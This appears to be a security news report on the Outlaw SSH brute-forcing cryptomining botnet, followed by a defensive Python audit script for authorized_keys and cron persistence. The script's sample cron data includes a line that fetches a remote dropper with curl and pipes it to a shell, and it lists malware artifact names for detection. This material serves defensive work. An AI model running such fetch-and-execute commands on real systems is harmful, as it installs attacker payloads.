Cybersecurity researchers have disclosed an “auto-propagating” cryptocurrency mining botnet known as Outlaw (aka Dota) that is known for targeting SSH servers with weak credentials.
“Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems,” Elastic Security Labs said in a new analysis published Tuesday.
Outlaw is also the name given to the threat actors behind the malware. It is believed to be of Romanian origin. Other hacking groups dominating the cryptojacking landscape include 8220, Keksec (aka Kek Security), Kinsing, and TeamTNT.
Active since at least late 2018, the hacking crew has brute-forced SSH servers, abusing the foothold to conduct reconnaissance and maintain persistence on the compromised hosts by adding their own SSH keys to the “authorized_keys” file.
The attackers are also known to use a multi-stage infection process that involves a dropper shell script (“tddwrt7s.sh”) downloading an archive file (“dota3.tar.gz”), which is then unpacked to launch the miner while also taking steps to remove traces of past compromises and kill both competing miners and their own earlier miners.
A notable feature of the malware is an initial access component (aka BLITZ) that allows for self-propagation of the malware in a botnet-like fashion by scanning for vulnerable systems running an SSH service. The brute-force module is configured to fetch a target list from an SSH command-and-control (C2) server to further perpetuate the cycle.

Some iterations of the attacks have also resorted to exploiting Linux- and Unix-based operating systems susceptible to CVE-2016-8655 and CVE-2016-5195 (aka Dirty COW), as well as attacking systems with weak Telnet credentials. Upon gaining initial access, the malware deploys SHELLBOT for remote control via a C2 server using an IRC channel.
SHELLBOT, for its part, enables the execution of arbitrary shell commands, downloads and runs additional payloads, launches DDoS attacks, steals credentials, and exfiltrates sensitive information.
As part of its mining process, it determines the CPU of the infected system and enables hugepages for all CPU cores to increase memory access efficiency. The malware also uses a binary called kswap01 to ensure persistent communications with the threat actor’s infrastructure.
“Outlaw remains active despite using basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” Elastic said. “The malware deploys modified XMRig miners, leverages IRC for C2, and includes publicly available scripts for persistence and defense evasion.”
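The two persistence mechanisms named in the article (an appended SSH key in authorized_keys and cron jobs) are cheap to audit on a host. The script below is an added example written for this page, not code from the article or from Elastic; the artifact names come from the article, while the key blobs, comments, cron entries and paths are constructed placeholders.

```python
"""Audit authorized_keys against an approved set and flag cron lines naming Outlaw artifacts."""
import re

# File and binary names taken from the article; the surrounding paths below are constructed.
OUTLAW_ARTIFACTS = ("tddwrt7s.sh", "dota3.tar.gz", "dota3", "kswap01")

# Constructed sample input: one provisioned admin key and one key nobody approved.
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyPlaceholder admin@bastion\n"
    "# keys below this line were not provisioned by configuration management\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABUnknownKeyPlaceholder unknown@nowhere\n"
)
APPROVED_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIAdminKeyPlaceholder"}

# Constructed crontab lines: one legitimate job and two hypothetical persistence entries.
SAMPLE_CRON = [
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/5 * * * * /tmp/.x/kswap01 >/dev/null 2>&1",
    "@reboot curl -s http://placeholder.invalid/tddwrt7s.sh | sh",
]


def parse_authorized_keys(text):
    """Yield (key_type, key_blob, comment) per key line; skips blanks, comments and options."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # A line may begin with an options field (e.g. command="..."); the key type follows it.
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or len(fields) < idx + 2:
            continue
        yield fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])


def unapproved_keys(text, approved_blobs):
    """Return (type, comment) for every key whose material is not in the approved set."""
    return [(ktype, comment) for ktype, blob, comment in parse_authorized_keys(text)
            if blob not in approved_blobs]


def suspicious_cron(lines, artifacts=OUTLAW_ARTIFACTS):
    """Return cron lines that reference any of the named artifacts."""
    pattern = re.compile("|".join(re.escape(a) for a in artifacts))
    return [line for line in lines if pattern.search(line)]


if __name__ == "__main__":
    print("unapproved keys:", unapproved_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED_KEY_BLOBS))
    print("suspicious cron:", suspicious_cron(SAMPLE_CRON))
```

On a real host, feed the script the contents of each user's ~/.ssh/authorized_keys and the output of `crontab -l` plus /etc/cron.d; a key that is not in your provisioning records is the finding, whatever its comment says.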